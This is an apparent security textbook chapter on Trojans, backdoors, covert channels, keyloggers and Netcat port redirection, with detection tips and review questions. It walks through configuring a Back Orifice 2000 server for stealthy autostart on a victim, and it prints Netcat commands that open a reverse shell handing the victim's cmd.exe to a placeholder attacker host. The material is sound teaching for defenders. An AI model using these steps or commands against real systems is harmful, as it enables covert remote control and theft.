ONE OF THE OLDEST and most commonly misunderstood forms of malware is the Trojan horse or Trojan. Trojans are pieces of software that are designed to give an attacker covert access to a victim's system. A Trojan is designed to be slipped onto a system quickly and stealthily to start whatever action it is meant to perform. Trojans are small and compact. This makes them one of the hardest types of software to detect on a system.
Trojan horses have a long history in the field of computer security. Since they first came into existence, they have represented one of the chief threats and dangers to users, as they can appear very attractive, enticing them to click on and install software that grants someone else full control of their systems. Such programs operate effectively once they have been installed, as they use existing communication methods such as ports to transfer their information between systems using overt channels to carry information in covert channels.
A Trojan can be defined as a program that carries something of hidden intent. Because of their ability to hide from detection, Trojans represent one of the leading threats to their targets' systems. Trojans have been hidden in a diverse group of software packages, including games, chat software, e-mail, Flash movies, and other types of software. When a program is said to be "Trojaned," it has been infected or embedded with some function that is malicious in purpose.
When a Trojan is planted on a system successfully, the intent is usually to open what is known as a backdoor. Backdoors are openings on a system that an attacker makes to bypass normal security measures on a system. With one of these openings in place, attackers can gain undetected, unchecked access to a system for any purpose they intend, which is typically some sort of remote access. This lets attackers steal information, control a system remotely, upload files, and even use one system to attack another system.
Included in the discussion of Trojans and backdoors are what are known as covert and overt channels. These two channels represent a mechanism for transferring information between systems and processes in ways that are supported and unsupported. Overt channels represent the path that data and other information are supposed to travel over by design. As such, the paths can be properly monitored and controlled. Covert channels are said to be in effect whenever data and other information are transferred over mechanisms not specifically designed to carry the information in question. Covert channels represent a free ride for attackers, as their activities over these paths may go completely undetected.
In this chapter we will discuss the various mechanisms that an attacker can use to gain control of, maintain control of, and transfer information to and from a victim system.
Trojans are one of the oldest mechanisms used to compromise a computer system and are still one of the more effective methods of doing so. When planned and implemented correctly, a Trojan can grant access to a system on behalf of the attacker, allowing all sorts of activities to take place.
Software in the Trojan category represents one of the biggest dangers to the end user or owner of a system. Users can be easily coerced into installing or running software that looks legitimate but hides a payload that does something unwanted, such as opening up avenues that an attacker can use. Further complicating things is the fact that Trojans operate on a principle that can be summed up as "permitting what you cannot deny"; in other words, using ports and mechanisms on the system that you have to leave open for the system to function normally such as ports 80 and 21. These programs can even redirect traffic in ways that they use ports that are open in place of ones that the attacker does not wish to use.
The list of pieces of software that can be Trojaned is endless. It includes anything that the creator believes will entice the victim to open the software. Applications such as games, chat software, media players, screen savers, and other similar types have been Trojaned. For example, an attacker may choose a popular downloadable game as a distribution method by downloading it, infecting it, and posting it on a discussion group. By choosing a popular piece of software that people will willingly download, the attacker increases the chances of higher infection rates.
A hacker may have several goals in mind when creating a Trojan, but typically it is to maintain access for later usage. For example, an attacker may compromise a system and install a Trojan that will leave a backdoor on the system.
Types of Trojans include:
Remote access—Remote access Trojans (RAT) are designed to give an attacker control over a victim's system. Two well-known members of this class are the SubSeven program and its cousin Back Orifice. Typically members of this class work in two components: a client and a server.
Data sending—Trojans of this type are designed to capture and redirect data to an attacker. The types of data these Trojans can capture are varied but can include anything from keystrokes and passwords to any other type of information that may be generated or reside on the system. This information can be redirected to a hidden file or even e-mail if there is a predefined e-mail account.
Destructive—Software in this category is designed to do one thing and one thing only: destroy data and kill a system.
Denial of service (DoS)—Software in this category is designed to target a specific service or system, overwhelm it, and shut it down.
Proxy—Trojans that fit into this category allow attackers to use a victim's system to perform their own activities. Using a victim's system to carry out a crime makes locating the actual perpetrator much more difficult.
FTP—Software in this category is designed to set up the infected system as an FTP server. An infected system will become a server hosting all sorts of data including illegal software, pirated movies and music or, as has been observed in some cases, pornography.
Security software disablers—Trojans of this type are designed to specifically target the security countermeasures present on a system and shut them down. On a system infected with this software, mechanisms such as antivirus, firewall, and system updates are often disabled. Trojans often use this strategy first to infect a system and then perform activities from one of the other categories, such as setting up a proxy server or FTP site.
Computer Trojans emerged in the mid-1980s as a way to infect software and distribute the infected payload to different systems without raising suspicion. In most situations, but not all, Trojans are intended to allow an attacker to remotely access or control a victim's system. In the event an application that is infected with a Trojan is installed on a target system, the attacker can not only obtain remote access, but also perform other operations designed to gain control of the infected system. In fact the operations that an attacker can perform are limited by only two factors: the privileges of the user account it is running under and the design the author has chosen to implement. By infecting a system with a Trojan, an attacker opens up a backdoor to the system that he or she can take advantage of.
Hackers have a range of options, from high-tech to low, for getting Trojans onto their victims' computers. A common theme among these methods is that they play on the human desire to get something for nothing. Here are the common methods for installing a Trojan:
Peer-to-peer networks (P2P)—This delivery mechanism has become very popular due to the increased number of individuals using these networks to obtain software free of charge. An attacker can easily grab a legitimate piece of software, embed a Trojan in it, and post it on file sharing and wait for victims to download it.
Instant messaging (IM)—Delivering malicious software via IM has been very common as it is easy and IM software has never had much in the way of security controls.
Internet Relay Chat (IRC)—IRC is a mechanism commonly used to deliver messages and software due to its widespread use and its ability to entice new users to download software.
E-mail attachments—With the rise of e-mail as a communication medium, the practice of using it to distribute Trojans also rose. Trojans have been distributed in this medium as attachments and as clickable links.
Physical access—Decidedly low tech but no less effective is physical access to a system. Once an attacker gains physical access, it becomes relatively easy to install the Trojan and compromise the system.
Browser defects—With many users forgetting to or choosing not to update their browsers as soon as updates are released, distribution of Trojans becomes easier. Since Web browsers are designed by their very nature to treat content that they are sent as trusted, this allows malicious programs to run unabated.
Freeware—You don't get something for nothing and thinking you are getting free software can lead to disaster. Downloading software for no charge from unknown or untrusted sources can mean that you may have downloaded something nastier, such as a Trojan infested application.
Operations that could be performed by a hacker on a target computer system include:
Data theft
Installation of software
Downloading or uploading of files
Modification of files
Installing keyloggers
Viewing the system user's screen
Consuming computer storage space
Crashing the victim's system
Trojans are commonly grouped into the category as viruses, but this is not entirely correct. Trojans are similar in certain ways to viruses in that they attach to other files which they use as a carrier, but they are different in the fact that they are not designed to replicate. The method of distribution that is used for Trojans is simple in that they attach themselves to another file and the file is retrieved and executed by an unsuspecting victim. Once this event occurs, the Trojan typically grants access to the attacker or can do some other action on the attacker's behalf.
Trojans require instructions from the hacker to fully realize their purpose before or after distribution. In fact, is has been shown in the majority of cases that Trojans are not actually distributed past the initial stages by their creators. Once attackers release their code into the world, they switch their involvement from the distribution to the listening phase, where Trojans will call home, indicating they have infected a system and may be awaiting instructions.
The more we all use the Internet to communicate, shop, and even store our stuff, the more we generate targets for hackers and their Trojan horses. Here are some of the targets that tempt hackers:
Credit card data—Credit card data and personal information is a tempting and all too common target. Upon obtaining this information an attacker can embark on a shopping spree purchasing any type of product or service they desire, such as Web services, games or other products.
Passwords—Passwords are always an attractive target for attackers. If they obtain this sort of information, it can prove devastating to the victim. Since most individuals will reuse passwords over and over again, getting one password from an individual can easily open many doors. And using a Trojan to obtain passwords can mean that a hacker can read passwords from a system that includes everything from e-mail and Internet accounts to banking passwords.
Insider information—Confidential or insider information is another target for an attacker. An attacker may very well use a Trojan to gain information from an organization that may not otherwise be public.
Data storage—In some cases a system that becomes the unlucky recipient of a Trojan may find itself a point for storing data without their knowledge. Uploading data to an infected system can turn that system into a server that can host any type of content. Infected hosts have been known to include illegal music or movies, pirated software, pornography, financial data, or even child pornography.
Random acts of mischief—In some cases the intention may just want to irritate or annoy the system owner. The hacker may have simply want to have some fun at the victim's expense.
Note
Trojans rely on the fact that they look like something the user wants, such as a game or piece of free software. When users install or run this software they run the main program, but unbeknown to them, the Trojan is running in the background.
The first widespread Trojans to appear debuted between 1994 and 1998 as distribution methods became more robust (think Internet). Prior to this point the software was distributed via bulletin board systems (BBSs) floppies, and similar of methods. Since the early days of Trojans the sophistication of the software has increased, as has the number of reported incidents associated with this type of code. Of course as Trojans increased in sophistication, so did the methods used to thwart them, such as antivirus software and other tools.
So what are the symptoms or effects of an infection of a Trojan? In the event that your antivirus does not detect and eliminate this type of software, it helps to be able to identify some of the signs of a Trojan infection:
The CD drawer of a computer opens and closes.
The computer screen changes, as by flipping or inverting.
Screen settings change by themselves.
Documents print with no explanation.
The browser is redirected to a strange or unknown Web page.
Windows color settings change.
Screen saver settings change.
Right and left mouse buttons reverse their functions.
The mouse pointer disappears.
The mouse pointer moves in unexplained ways.
The start button disappears.
Chat boxes appear on the infected system.
The Internet Service Provider (ISP) reports that the victim's computer is running port scans.
People chatting appear to know detailed personal information.
The system shuts down by itself.
The taskbar disappears.
The account passwords are changed.
Legitimate accounts are accessed without authorization.
Unknown purchase statements appear in credit card bills.
Modems dial and connect to the Internet by themselves.
Ctrl+Alt+Del stops working.
While the computer is rebooted, a message states that there are other users still connected.
There are several methods of detecting if a Trojan is present on a system, but few prove more useful to the security professional than looking at ports, so let's go back to a topic that was discussed in a previous chapter.
If Trojans are going to give an attacker the ability to attach to a system remotely, they are going to need to attach to the system through the use of a port. Some Trojans use well known ports that can be easily detected; others may use nonstandard or obscure ports that will need a little extra investigation to determine what is listening (whether it is a legitimate service or something else). Table 11-1 lists some of the common ports that are used for some classic Trojans.
Table 11-1. Some classic Trojans and the ports and protocols they use.
TROJAN | PROTOCOL | PORTS |
|---|---|---|
Back Orifice | UDP | 31337 or 31338 |
Back Orifice 2000 | TCP/UDP | 54320/54321 |
Beast | TCP | 6666 |
Citrix ICA | TCP/UDP | 1494 |
Deep Throat | UDP | 2140 and 3150 |
Desktop Control | UDP | NA |
Donald Dick TCP | TCP | 23476/23477 |
Loki | ICMP (Internet Control Message Protocol) | NA |
NetBus | TCP | 12345 and 12346 |
Netcat | TCP/UDP | Any |
Netmeeting Remote | TCP | 49608/49609 |
pcAnywhere | TCP | 5631/5632/65301 |
Reachout | TCP | 43188 |
Remotely Anywhere | TCP | 2000/2001 |
Remote | TCP/UDP | 135-1139 |
Whack-a-mole | TCP | 12361 and 12362 |
NetBus 2 Pro | TCP | 20034 |
GirlFriend | TCP | 21544 |
Masters Paradise | TCP | 3129, 40421, 40422, 40423 and 40426 |
Timbuktu | TCP/UDP | 407 |
VNC | TCP/UDP | 5800/5801 |
Of the tools for detecting Trojans, one of the easiest to access would be the command line tool known as netstat. Using netstat it is possible to list the ports that are listening on a system and browse each to see what is supposed to be running on each.
In Windows at the command line you can type the following command:
netstat -an
This command will display the results shown in Figure 11-1.
Another tool that could help you locate the ports that a Trojan is listening for instructions on is nmap. With nmap you can scan a system and get a report back on the ports that are listening and investigate further to see if any unusual activity is afoot.
Providing an additional tool is the use of a category of software known as the vulnerability scanner. Software of this type can be used to scan a system, locate, and report back on services such as Trojans listening on the ports of a system. One of the best known scanners of this type is the tool known as Nessus.
There exist a wide range of tools used to take control of a victim's system and leave behind a "present" for them in the form of a backdoor. We will not attempt to cover all these tools, but for reference the following list includes some of the more common ones that have been found in the wild. Note that this is not an exhaustive list and there are newer variants in existence:
Let me rule—A remote access Trojan authored entirely in Delphi; uses TCP port 26097 by default
RECUB—Remoted Encrypted Callback UNIX Backdoor (RECUB) borrows its name from the UNIX world. This product features RC4 encryption, code injection, and encrypted ICMP communication request. Demonstrates a key trait of Trojan software, small size, as it tips the scale at less than 6 KB.
Phatbot—Capable of stealing personal information including e-mail addresses, credit card numbers, and software licensing codes. Returns this information to the attacker or requestor using a peer-to-peer (P2P) network. Phatbot also has the ability to terminate many antivirus and software-based firewall products leaving the victim open to secondary attacks.
Amitis—Opens up TCP port 27551 to give the hacker complete control of the victim's computer.
Zombam.B—Allows the attacker to use a Web browser to infect a computer. Uses port 80 by default, created with a Trojan generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes.
Beast—Uses a technique known as DDL (Data Definition Language) injection. Using this technique the Trojan injects itself into an existing process, effectively hiding itself from process viewers. It is harder to detect and harder to eradicate.
Hard disk killer—A Trojan written to destroy a system's hard drive. When executed it will attack a system's hard drive and wipe the hard drive in just a few seconds.
Going back to something that was discussed in a previous chapter known as the NULL session, this is something we can use to place a Trojan. As you read, the NULL session is a feature of Windows that allows connections under the guise of the anonymous user. With this NULL session a connection can be made to enumerate shares and services on the system for whatever goal the attacker may have, which can be, in this chapter, to install a Trojan.
Note
Back Orifice is an older Trojan tool that is stopped by any of the major antivirus applications that are in circulation today.
Using a NULL session we will install one of the oldest and most powerful tools for gaining access to systems or performing remote administration. Back Orifice (BO2K) can be placed on a victim's system to give the attacker the ability to perform a diverse range of attacks.
The manufacturer of Back Orifice says this about B02K:
"Built upon the phenomenal success of Back Orifice released in August 98, BO2K puts network administrators solidly back in control. In control of the system, network, registry, passwords, file system, and processes. BO2K is a lot like other major file-synchronization and remote control packages that are on the market as commercial products. Except that BO2K is smaller, faster, free, and very, very extensible. With the help of the open-source development community, BO2K will grow even more powerful. With new plug-ins and features being added all the time, BO2K is an obvious choice for the productive network administrator."
Note
Back Orifice is billed by the manufacturer as a remote administrator tool, but others will call it a Trojan instead. We will not address or attempt to settle this argument here, but we will treat the tool as a Trojan as it exhibits the behaviors associated with this class of software.
Whether you consider it a Trojan or a "remote administrator tool," the capabilities of BOK2 are fairly extensive for something of this type. This list of features is adapted from the manufacturer's Web site:
Address book style server list
Functionality can be extended via the use of plug-ins.
Multiple simultaneous server connections
Session logging capability
Key logging capability
Hypertext Transfer Protocol (HTTP) file system browsing and transfer
Microsoft Networking file sharing
Remote registry editing
File browsing, transfer, and management
Plug-in extensibility
Remote upgrading, installation, and uninstallation
Network redirection of Transfer Control Protocol/Internet Protocol (TCP/IP) connections
Access console programs such as command shells through Telnet
Multimedia support for audio/video capture, and audio playback
Windows NT registry passwords and Win9x screen saver password dumping
Process control, start, stop, list
Multiple client connections over any medium
GUI message prompts
Proprietary file compression
Remote reboot
Domain Name Service (DNS) name resolution Features Added by Plug-ins
Cryptographically Strong Triple-DES encryption
Remote desktop with optional mouse and keyboard control
Drag and drop encrypted file transfers and Explorer-like filesystem browsing
Graphical remote registry editing
Reliable User datagram protocol (UDP) and Internet Control Message Protocol (ICMP) communications protocols
Back Orifice 2000 (BO2K) is a next generation tool that was designed to accept customized, specially designed plug-ins. BO2K represents a dangerous tool in the wrong hands. With the software's ability to be configured to carry out a diverse set of tasks at the attacker's behest, it can be a devastating tool. BO2K consists of two software components in the form of a client and a server.
To use the BO2K server, the configuration is as follows:
Start the BO2K Wizard and click Next when the Wizard's splash screen appears.
When prompted by the Wizard, enter the server executable to be edited.
Choose the protocol to run the server communication over.
The typical choice is to use TCP as the protocol due to its inherent robustness.
UDP is typically used if a firewall or other security architecture needs to be traversed.
After choosing to use TCP to control the BO2K server, the next screen queries the port number that will be used.
Port 80 is generally open, and so it's the one most often used, but any open port can be used.
In the next screen, enter a password that will be used to access the server.
Note that passwords can be used but the attacker could choose open authentication that would mean that anyone could access without having to supply credentials of any kind.
The server configuration tool is provided with the information the attacker has entered when the Wizard finishes.
The server can then be configured to start when the system starts up.
This will allow the program to restart every time the system is rebooted, preventing the program from becoming unavailable.
Click Save Server to save the changes and commit them to the server.
Once the server is configured it is now ready to be installed on the victim's system. No matter how the installation is to take place, the only application that needs to be run on the target system is the BO2K executable. Once this application is run, the victim's system will have the port that was configured previously opened on their system and be ready to accept input from the attacker.
In addition the application runs an executable file called Umgr32.exe and places it in the Windows system32 folder. Additionally, if you configured the BO2K executable to run in stealth mode, it will not show up in Task Manager as it modifies an existing running process to act as its cover. If stealth was not configured, the application will show up as a Remote Administration Service. Stealth or no stealth, the result is the same The attacker now has a foothold on the victim's system.
Configuring and creating Trojans has become very simple; the process of getting them onto the victim's system is the hard part. In today's environment users have become much more cautious than previously and generally are less likely to click on attachments and files they are suspicious of. Additionally, most systems include antivirus software that is designed to detect behavior that is the signature of Trojans. Tactics that used to work will not be as successful today.
To counter this change, tools are available that can be used to slip a dangerous payload past a victim's defenses. With the tools discussed briefly in this section together with knowledge of how a Trojan works, it is possible for even a novice to create an effective mechanism to deliver a payload on target.
One such application to deliver this type of payload is known as wrappers. Using wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. At this point, the new executable can be posted in some location where it is likely to be downloaded. Consider a situation where a would-be attacker downloads an authentic application from a vendor's Web site and uses wrappers to merge a Trojan (that is, BO2K) into the application before posting it on a newsgroup or other location. Some more advanced wrapper-style programs can even bind together several applications instead of the two mentioned here. What looks harmless to the downloader is actually a "bomb" waiting to go off on the system. When the victim runs the infected software, the infector installs and takes over the system.
Note
This scenario is similar to what can and does happen with software downloaded from so-called "warez" sites. In this instance an attacker downloads a legitimate program, embeds a payload into it, and posts it on file-sharing networks such as BitTorrent. Someone looking to get the new software free instead of paying for a legitimate copy actually gets a nasty surprise.
Wrappers tend to be one of the tools of choice for script kiddies due to their relative ease of use and their overall accessibility. Hackers in this category find them effective for their purposes.
Some of the better-known wrapper programs are the following:
EliteWrap—EliteWrap is one of the most popular wrapping tools available due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. Furthermore the software can even be configured to the point of letting the attacker choose an installation directory for the payload. Finally, software wrapped with EliteWrap can be configured to install silently without any user interaction.
Saran Wrap—A wrapper program specifically designed to work with and hide Back Orifice, it can bundle Back Orifice with an existing program into what appears to be a standard "Install Shield" installed program.
Trojan Man—This wrapper merges programs and can encrypt the new package in order to bypass antivirus programs.
Teflon Oil Patch—Another program designed to bind Trojans to a specified file in order to defeat Trojan detection applications
Restorator—An example of an application designed originally with the best of intentions but now used for less than honorable purposes. Has the ability to add a payload to a package, such as a screen saver, before it is forwarded to the victim.
Firekiller 2000—A tool designed to be used with other applications when wrapped. This application is designed to disable firewall and antivirus software. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to being patched.
One of the other tools that have emerged over the past few years is the Trojan construction kit. The purpose of these kits is to assist in the development of new Trojans. The emergence of these kits has made the process of creating Trojans so easy that even those with knowledge equivalent to the average script kiddie can create new and dangerous entities without much effort at all.
Several of these tools are shown in the following:
The Trojan construction kit—One of the best examples of a relatively easy to use, but potentially destructive, tool. This kit is command line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little bit of effort it is possible to build a Trojan that can engage in such destructive behavior as destroying partition tables, Master boot records (MBR), and hard drives.
Senna Spy—Another Trojan creation kit that is capable of custom options, such as file transfer, executing DOS commands, keyboard control, and list and control processes.
Stealth tool—A program used not to create Trojans, but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.
Many attackers gain access to their target system through something known as a backdoor. The owner of a system compromised in this way may have no indication that someone else is even using the system.
Typically a backdoor when implemented will achieve one or more of three key goals:
Provide the ability to access a system regardless of security measures that an administrator may take to prevent such access
Provide the ability to gain access to a system while keeping a low profile. This would allow an attacker to access a system and circumvent logging and other detective methods.
Provide the ability to access a system with minimal effort in the minimum amount of time. Under the right conditions a backdoor will allow the attacker to gain access to a system without having to "re-hack."
Some common backdoors that are placed on a system are of the following types and purposes:
Password-cracking backdoor—Backdoors of this type rely on an attacker uncovering and exploiting weak passwords that have been configured by the system owner. System owners who fail to follow accepted guidelines for making strong passwords become vulnerable to attacks of this type. A password-cracking backdoor in fact may be the first attack an aggressor will attempt as it provides access to a known account. In the event another account was used to crack the password, the system owner may find this account and shut it down; however, with another account compromised the attacker will still have access.
Rootkits—Another type of backdoor that can be created on a system is caused by attackers replacing existing files on the system with their own versions. Using this technique, an attacker can replace key system files on a computer and therefore alter the behavior of a system at a fundamental level. This type of attack uses a specially designed piece of software known as a rootkit that replaces these files with different versions. Once this process has been carried out, the system will now do something or behave differently than designed and once this is the case getting trustworthy information from a system may be questionable.
Services Backdoor—Network services are another target for attack and modification with a backdoor. Understanding how a service runs is important to understanding this attack. When a service runs, as explained previously, the process runs on a port such as 80 or 666. Once a service is answering on a port, an attacker can attach to the port and issue commands to the service that has been compromised. There are different ways for an attacker to get the compromised service on the system, but in all such cases the service installed is one that the attacker has modified and configured for his or her purpose.
Process hiding backdoors—An attacker wanting to stay undetected for as long as possible will typically choose to go the extra step of hiding the software he or she is running. Programs such as a compromised service, password cracker, sniffers, and rootkits are items that an attacker will want to configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program or altering other files on a system to prevent them from being detected and running.
Once a backdoor is in place, an attacker can access and manipulate the system at will.
An item of concern for a security professional is the covert channel and the danger it poses. Covert channels are capable of transferring information using a mechanism that was not designed for the purpose. When a covert channel is in use, information is typically being transferred in the open, but hidden within that information is the information that the sender and receiver wish to keep confidential. The beauty of this process is that unless you are looking for the information that is hidden, you will not be able to find it.
Note
The term covert channel was coined in 1972 and is defined as "mechanisms not intended for information transfer of any sort, such as the service program's effect on system load." This definition specifically differentiates covert channels from the normal mechanisms used to transfer information.
Additionally the Trusted Computer System Evaluation Criteria (TCSEC) defines two specific types of covert channels known as timing and storage channels:
Covert storage channels—Include all mechanisms or processes that facilitate the direct or indirect writing of data to a location by one service and the direct or indirect reading of it by another. These types of channels can involve either the direct or indirect writing to a location (such as a hard disk or flash drive) by one process and the subsequent direct or indirect accessing and reading of the storage location by different process or service.
Covert timing channels—Send their information by manipulating resource usage on the system (i.e. memory usage) to send a signal to a listening process. This attack is carried out by passing unauthorized information through the manipulation of the use of system resources (for example, changing the amount of CPU time or memory usage). One process will manipulate system resources in a specific, predefined way and these responses will be interpreted by a second process or service.
Tools to exploit covert channels include:
Loki—Was originally designed to be a proof of concept on how ICMP traffic can be used as a covert channel. This tool is used to pass information inside of ICMP echo packets, which can carry a data payload but typically do not. Since the ability to carry data is there already, but not used, this can make an ideal covert channel.
ICMP backdoor—Similar to Loki, but instead of using Ping echo packets it uses Ping replies.
007Shell—Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are normal in size
Reverse World Wide Web (WWW) Tunneling Shell—Creates covert channels through firewalls and proxies by masquerading as normal Web traffic
AckCmd—This program provides a command shell on Windows systems. Covert communication occurs via TCP ACK replies.
Another powerful way of extracting information from a victim's system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity on the system in the form of keyboard usage on a target system. When placed on a system it gives the attacker the ability to monitor all activity on a system and have it reported back to the attacker. Under the right conditions this software can capture passwords, confidential information, and other data.
Typically keyloggers are implemented one of two ways: hardware or software. In software-based versions, the device is implemented as a small piece of code that resides in the interface between the operating system and keyboard. The software is typically installed the same way any other Trojan would be bundled with something else and made available to the victim who then installs it and becomes infected. Once the software is installed, the attacker now receives all the information he or she is looking for.
Of course under the right conditions software-based keyloggers can be detected, so an alternative method is available in the form of hardware-based methods. Hardware-based keyloggers have the ability to be plugged into a universal serial bus (USB) or PS2 port on a system and monitor the passing signals for keystrokes. What makes hardware keyloggers particularly nasty is the fact that they are hard to detect unless you visually scan for them Consider the fact that most computer users never look at the back of their system and you have a recipe for disaster.
Some of the keystroke recorders include:
IKS Software Keylogger—A Windows based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs on a system, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it will not show up in process lists or through normal detection methods.
Ghost Keylogger—Another Windows-based keylogger that is designed to run silently in the background on a system much like IKS. The difference between this software and IKS is the ability to record activity to an encrypted log that can be e-mailed to the attacker.
Spector Pro—Designed to capture keystroke activity, e-mail passwords, chat conversations and logs, and instant messages.
FakegINA—This is an advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system, specifically to intercept the communication between the Winlogon process and the logon GUI in Windows.
One common way to exploit the power of covert channels is to use a process known as port redirection. Port redirection is a process where communications are redirected to different ports than they would normally be destined for. In practice this means traffic that is destined for one system is forwarded to another system.
When a packet is sent to a destination, it must have two things in place, an IP address and a port number, like so:
192.168.1.100:80
Or:
<ip_address>:<port number>
If a packet is destined for a Web server on a system with the address 192.168.1.210 it would look like the following:
192.168.1.210:80
This would tell the packet to go to the IP address and access port 80, which, by default, is the port used for the Web server service. As was seen in a previous chapter every system has 65,535 ports that can be accessed by services and used for communications. Some of these ports tend to be used more often than others. For example, HTTP uses port 80 and FTP uses port 21. In practice only those ports that will be used by applications should be available for use. Anything not explicitly in use should be blocked and typically is. This poses a challenge for the hacker, one that can be overcome using the technique of port redirection.
Port redirection is made possible by setting up a piece of software to listen on specified ports and when packets are received on these ports, the traffic is sent on to another system. Currently there are a myriad of tools available to do just this very thing, but the one we will look at more closely is Netcat.
Table 11-2. Options for Netcat.
SWITCH | DESCRIPTION |
|---|---|
Nc -d | Used to detach Netcat from the console |
Nc -l -p [port] | Used to create a simple listening TCP port; adding -u will place it into UDP mode |
Nc -e [program] | Used to redirect stdin/stdout from a program |
Nc -w [timeout] | Used to set a timeout before Netcat automatically quits |
Program | nc | Used to pipe output of program to Netcat |
Nc | program | Used to pipe output of Netcat to program |
Nc -h | Used to display help options |
Nc -v | Used to put Netcat into verbose mode |
Nc -g or nc -G | Used to specify source routing flags |
Nc -t | Used for Telnet negotiation |
Nc -o [file] | Used to hex dump traffic to file |
Nc -z | Used for port scanning |
Netcat is a simple command line utility available for Linux, UNIX, and Windows platforms. Netcat is designed to function by reading information from connections using TCP or UDP and doing simple port redirection on them as configured. Table 11-2 shows some of the options that can be used with Netcat.
Note
Netcat also has a close cousin known as Cryptcat, which adds the ability to encrypt the traffic it sends back and forth between systems. For the purposes of the discussion we will have here in this chapter, we will use Netcat alone, but consider using Cryptcat if you want the extra protection that comes with encrypting your communication.
Let us take a look at the steps involved to use Netcat to perform port redirection.
The first step is for the hacker to set up what is known as a listener on his or her system. This prepares the attacker's system to receive the information from the victim's system. To set up a listener, the command would be as follows:
nc -n -v -1 -p 80
After this, the attacker would need to execute a command on the victim's system to redirect the traffic to their system. To accomplish this, the hacker executes the following command from the intended victim's system:
nc -n hackers_ip 80 -e "cmd.exe "
Once this is entered, the net effect would be that the command shell on the victim's system would be at the attacker's command prompt ready for input as desired.
Of course Netcat has some other capabilities, including port scanning and placing files on a victim's system.
Port scanning can be accomplished using the following command:
nc -v -z -w1 IPaddress <start port> - <ending port>
This command would scan a range of ports as specified.
Of course Netcat isn't the only available tool to do port redirection. Tools such as Datapipe and Fpipe can perform the same functions albeit in different ways.
The best way to blunt the impact of Trojans is to stop them before they become an issue. When you become proactive instead of reactive, you can make management easier. Using all the tools available to you for prevention can make all the difference. Use of the following applications becomes a necessity when protecting a system:
Antivirus—Having software in place that actively looks for infections and eradicates them is paramount. Several of the applications mentioned here as Trojans can be thwarted by an antivirus.
Anti-spyware—This software works in concert with other forms of protection looking for suspicious behavior and items such as keyloggers.
Firewalls—Stopping communications between software such as clients and servers can block attacks quite easily and blunt the effect of Trojans in the event they get on the system.
Updates—Updating software and systems is a key defensive strategy that can address defects in software such as browsers that can be exploited by attackers.
Education—Knowing is half the battle and educating your users on proper procedures and how to prevent infections can yield benefits that other methods cannot.
What do you do if you suspect you are a victim already? Your toolbox already holds a number of tools that can be used to capture the telltale signs of infection. These include the following:
Taskmanager—Provided with Windows and used to display detailed information about running processes
Ps—The command equivalent of taskmanager, which is used to display the currently running processes on UNIX/Linux systems
Netstat—Netstat displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and more.
Tlist—A Windows-based tool used to list currently running processes on local or remote machines
TCPView—A GUI tool by Winternals used to display running processes
Process viewer—A Windows Graphical User Interface (GUI) utility that displays data about running processes
Inzider—Lists processes on a Windows system and the ports each one is listening on, Inzider is useful in locating Trojans that have injected themselves into other processes.
Note
Remember that if you suspect a system is infected or a piece of media is compromised in any way, the tools noted here should not be run from that location. Doing so can mean that the tool you are running may actually be infected or altered in some way to prevent your detecting them.
This chapter looked at one of the oldest forms of malware, known as the Trojan. Trojans are software applications that are designed to deliver control of a system to an attacker. By design, Trojans are meant to be installed quickly and stealthily on a victim's system so as to avoid detection.
Once a Trojan is installed successfully on a system, the next step most of them perform is to open a backdoor. Backdoors are openings put in place by an attacker to bypass the normal security measures that exist on a system. Once these constructs are in place the attacker has the ability to gain stealthy and unchecked access to a system for any purpose that they intended. Typically, this access is given for the purpose of remote access, but it could be for data transfer or other purposes.
Working in concert with a backdoor is something known as a covert and overt channel. A backdoor can be installed by a Trojan that will in turn provide a covert channel that can be used to avoid detection and the stopping of an attack. Covert channels represent mechanisms for transferring information between systems and processes in ways that they were not intended to do. With data and information being transmitted over unsupported channels, the problem becomes one of a lack of security measures as unsupported channels may not be monitored the same way as supported ones are, if at all. Overt channels are the ways the data is expected to be transferred, but inside these channels an attacker can hide covert channels.
Covert channels
Master boot records (MBR)
Overt channels
Port redirection
PS2
Trojan construction kit
Trusted Computer System Evaluation Criteria (TCSEC)
Universal serial bus (USB)
Trojans are a type of malware.
True
False
Covert channels work over
known channels
wireless
networks
security controls
Which of the following is one of the goals of Trojans?
Send data
Change system settings
Open overt channels
Give remote access
Backdoors are an example of covert channels.
True
False
_______ are methods for transferring data in an unmonitored manner.
Backdoors on a system can be used to bypass firewalls and other protective measures.
True
False
Trojans can be used to open backdoors on a system.
True
False
Trojans are designed to be small and stealthy in order to:
Bypass covert channels
Bypass firewalls
Bypass permissions
Bypass detection